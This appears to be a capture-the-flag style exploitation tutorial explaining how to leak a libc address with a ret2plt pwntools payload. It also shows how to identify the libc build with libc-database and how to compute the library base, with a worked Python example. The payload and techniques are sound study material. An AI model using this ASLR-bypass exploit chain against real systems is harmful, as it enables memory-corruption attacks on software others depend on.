# Leaking LibC

When ASLR is enabled, libc is mapped at a random base on every run, so the address of one libc function has to be leaked first. From that single leak the addresses of every other libc function (and gadget) can be computed, because only the base moves between runs while the offsets inside the library stay fixed.

## Leaking Libc function address

To obtain such an address, the [ret2plt](broken://pages/YhXrENTBcmoxFBMwPaNs) attack can be used:

```python
from pwn import *

elf = ELF('./chall')
p = process(elf.path)

padding = 40  # offset from the buffer to the saved return address (find it with a cyclic pattern)

# ret2plt (32-bit cdecl layout): call puts@plt, "return" into main to keep the
# process alive, and pass puts@got as the single argument so puts prints its own
# resolved address.
payload = flat(
    b'A' * padding,
    elf.plt['puts'],
    elf.symbols['main'],
    elf.got['puts']
)

p.sendline(payload)
leak = u32(p.recv(4))  # first 4 bytes printed by puts are the little-endian GOT entry
log.info("puts @ %s" % hex(leak))
```

Here `puts` is called with its own GOT entry as argument, so the process prints the libc address of `puts`. This works even if the binary never called `puts` before: going through `puts@plt` makes the dynamic linker resolve the symbol and fill the GOT entry before `puts` reads it. Returning into `main` afterwards keeps the process alive so a second, libc-aware payload can be sent in the same run (a new process would get a new libc base).

## Finding LIBC library

To determine which version of libc the program uses, find the library build that contains `puts` at an address consistent with the leak.

Because ASLR shifts libc by whole pages (0x1000 bytes), only the high bits of the leaked address are random: the low 12 bits are the page offset of `puts` inside the library and are identical across runs. This can be done by **searching through the available library versions** and **comparing the low 12 bits of their `puts` offset with the leaked address**. A build whose `puts` offset ends in the same three hex digits as the leak is a candidate; if several remain, keep only those matching the target's architecture and, if needed, leak a second function and check that both leaks imply the same base.

Fortunately, several databases and tools make this process easier, such as the "[Libc database search engine](https://libc.blukat.me)" or "[libc database](https://github.com/niklasb/libc-database.git)" (its `find` script accepts several `symbol address` pairs to narrow the result down):

```bash
$ ./find puts 0xf7d5f460
ubuntu-old-glibc (libc6_2.26-0ubuntu2.1_amd64)
ubuntu-old-glibc (libc6_2.26-0ubuntu2_amd64)
debian-glibc (libc6_2.31-13+deb11u5_i386)
ubuntu-old-eglibc (libc6-i386_2.13-20ubuntu5_amd64)

$ ./download libc6_2.26-0ubuntu2.1_amd64
Getting libc6_2.26-0ubuntu2.1_amd64
  -> Location: http://old-releases.ubuntu.com/ubuntu/pool/main/g/glibc//libc6_2.26-0ubuntu2.1_amd64.deb
  -> Downloading package
  -> Extracting package
  -> Package saved to libs/libc6_2.26-0ubuntu2.1_amd64
```

{% hint style="info" %}

### Other functions to leak

Any imported function works as long as its GOT entry has already been resolved, i.e. the function was called at least once before the leak (or the binary was linked with full RELRO / `BIND_NOW`, in which case every entry is resolved at load time). `__libc_start_main` is a safe choice since it runs before `main`.

```python
puts
printf
__libc_start_main
read
gets
```

{% endhint %}

## Getting libc base address

```python
libc = ELF("libs/libc6_2.26-0ubuntu2.1_amd64")

func_name = 'puts'        # the function whose GOT entry was leaked
leak = u32(p.recv(4))     # leaked address (see the ret2plt payload above)

libc.address = leak - libc.symbols[func_name]  # base = leaked address - offset of the symbol in libc
log.success("LIBC base: %s" % hex(libc.address))
```

```bash
[+] LIBC base: 0xf7d70000
```

{% hint style="info" %}
Note that the final libc base address must be page-aligned, i.e. end in `000`. If that's not the case, the leaked address was parsed incorrectly or the wrong libc build was chosen (its symbol offset differs from the one in the target's libc).
{% endhint %}
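The three steps above (parsing the bytes `puts` printed, matching them against candidate libc builds the way libc-database's `find` does, and deriving a page-aligned base) as an added, self-contained example that is not part of the original page. It needs no pwntools and no target process: the raw output, the candidate table and all symbol offsets are constructed for illustration (real offsets come from the `.symbols` files of the libc-database). It also shows the disambiguation step the text mentions, where a second leaked function rules out builds that happen to share the low 12 bits of `puts`.

```python
import struct

PAGE_MASK = 0xfff  # ASLR moves libc by whole pages, so the low 12 bits of every symbol survive

# Constructed candidate table (hypothetical builds, offsets chosen for this example only).
LIBC_CANDIDATES = {
    "libc-A_i386":  {"puts": 0x5f460, "printf": 0x49670, "system": 0x3ad60},
    "libc-B_i386":  {"puts": 0x67460, "printf": 0x4e670, "system": 0x3d200},
    "libc-C_amd64": {"puts": 0x80460, "printf": 0x64f70, "system": 0x4f420},
}


def parse_leak(raw: bytes, word_size: int = 4) -> int:
    """Turn the bytes printed by puts(got_entry) into an integer address.

    puts stops at the first NUL byte and appends a newline, so an address with a
    zero high byte arrives short; pad it back to word_size before unpacking
    (little-endian, as stored in the GOT).
    """
    leaked = raw.split(b"\n", 1)[0][:word_size]
    return struct.unpack("<I" if word_size == 4 else "<Q",
                         leaked.ljust(word_size, b"\x00"))[0]


def find_libc(leaks: dict, candidates=LIBC_CANDIDATES) -> list:
    """Return (build, base) pairs consistent with every leaked symbol.

    A build is kept only if each leaked address matches the symbol's page
    offset and all leaks imply the same base, which is what libc-database's
    `find` checks when given several symbol/address pairs.
    """
    matches = []
    for build, symbols in candidates.items():
        bases = set()
        for func, addr in leaks.items():
            off = symbols.get(func)
            if off is None or (addr & PAGE_MASK) != (off & PAGE_MASK):
                break
            bases.add(addr - off)
        else:
            if len(bases) == 1:
                matches.append((build, bases.pop()))
    return matches


def libc_base(leak: int, offset: int) -> int:
    """base = leak - offset, rejecting anything that is not page-aligned."""
    base = leak - offset
    if base & PAGE_MASK:
        raise ValueError("base %#x is not page-aligned: wrong libc or bad leak" % base)
    return base


def resolve(base: int, build: str, func: str, candidates=LIBC_CANDIDATES) -> int:
    """Address of another libc function once the base is known."""
    return base + candidates[build][func]


if __name__ == "__main__":
    # Constructed output of puts(puts@got) for a 32-bit target: 0xf7d5f460 little-endian + '\n'.
    puts_leak = parse_leak(b"\x60\xf4\xd5\xf7\n")

    # One leak alone leaves every build whose puts offset ends in 0x460.
    print("puts only:", find_libc({"puts": puts_leak}))

    # A second (constructed) leak of printf narrows it to a single build.
    printf_leak = parse_leak(b"\x70\x96\xd4\xf7\n")
    (build, base), = find_libc({"puts": puts_leak, "printf": printf_leak})
    assert base == libc_base(puts_leak, LIBC_CANDIDATES[build]["puts"])
    print("build: %s  base: %#x  system: %#x" % (build, base, resolve(base, build, "system")))
```

With only the `puts` leak all three constructed builds match, including the amd64 one, which is why the candidate list should be filtered by architecture and, when in doubt, confirmed with a second leaked function before the base is trusted.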

## Resources

{% embed url="https://book.hacktricks.xyz/reversing-and-exploiting/linux-exploiting-basic-esp/rop-leaking-libc-address" %}

